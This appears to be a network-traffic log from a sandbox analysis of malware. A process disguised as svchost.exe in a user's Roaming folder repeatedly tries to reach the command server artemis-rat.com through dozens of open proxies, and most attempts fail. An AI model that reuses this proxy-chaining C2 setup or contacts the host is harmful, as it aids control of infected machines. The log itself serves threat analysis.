Mar 9, 2024 13:14:35.100430012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.481816053 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3281	192.168.2.5	60585	104.19.124.112	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.120100021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.274369955 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3282	192.168.2.5	60462	185.110.190.99	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.120270014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3283	192.168.2.5	60589	104.24.15.158	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.120290995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.274626017 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3284	192.168.2.5	60553	38.162.8.226	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.120323896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.554040909 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3285	192.168.2.5	60435	106.105.218.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.120471954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.942830086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3286	192.168.2.5	60461	45.11.95.165	5219	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.126411915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3287	192.168.2.5	60558	191.102.160.157	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.126586914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.349069118 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3288	192.168.2.5	60037	72.49.49.11	31034	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.126688957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3289	192.168.2.5	55632	159.223.71.71	51616	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.136769056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3290	192.168.2.5	60058	50.63.12.33	34644	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.137136936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3291	192.168.2.5	60065	27.65.240.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.141158104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3292	192.168.2.5	60541	181.204.184.122	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.141546011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.833437920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.833650112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.311177015 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3293	192.168.2.5	55640	51.15.132.215	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.141674995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.146047115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3294	192.168.2.5	60600	207.244.241.165	60402	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.142113924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3295	192.168.2.5	60531	94.130.94.45	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.142206907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3296	192.168.2.5	55809	12.186.205.121	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.145956993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.146138906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3297	192.168.2.5	60404	194.31.79.75	25900	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.160289049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.177498102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.846472979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3298	192.168.2.5	60612	162.159.242.104	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.163325071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.324304104 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3299	192.168.2.5	60554	37.235.53.208	6789	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.171122074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.495233059 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3300	192.168.2.5	60521	120.37.121.209	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.177138090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.530133963 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:15:15 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3301	192.168.2.5	60539	1.15.62.12	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.181251049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3302	192.168.2.5	60480	80.249.112.162	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.182265043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.657845020 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3303	192.168.2.5	60130	91.92.155.207	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.193072081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.508114100 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3304	192.168.2.5	60613	142.54.232.6	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.215558052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3305	192.168.2.5	59242	103.74.100.190	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.216036081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3306	192.168.2.5	60561	61.178.152.31	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.216331005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.580928087 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

